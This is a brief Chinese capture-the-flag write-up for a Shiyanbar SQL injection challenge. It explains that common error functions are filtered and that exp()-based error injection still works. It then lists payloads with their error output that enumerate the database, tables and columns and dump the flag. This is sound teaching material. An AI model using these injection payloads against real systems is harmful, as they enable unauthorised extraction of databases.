实验吧-简单的sql注入之3

原题链接

http://ctf5.shiyanbar.com/web/index_3.php

分析

提示说报错注入，但是发现updatexml,floor，extractvalue,都显示Don't

exp函数任然可以，利用exp函数报错。
直接上payload：

DB：
?id='or exp(~(Select * From (select database())x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
DB: web1

TB:
?id='or exp(~(Select * From (select group_concat(table_name) from information_schema.tables where table_schema=database())x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
TB: flag,web_1

Col：
?id='or exp(~(Select * From (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag')x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
Col: flag,id

DUMP:
?id='or exp(~(Select * From (select flag from flag)x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'
flag: flag{Y0u_@r3_5O_dAmn_90Od}

flag

flag{Y0u_@r3_5O_dAmn_90Od}

知识点

exp报错注入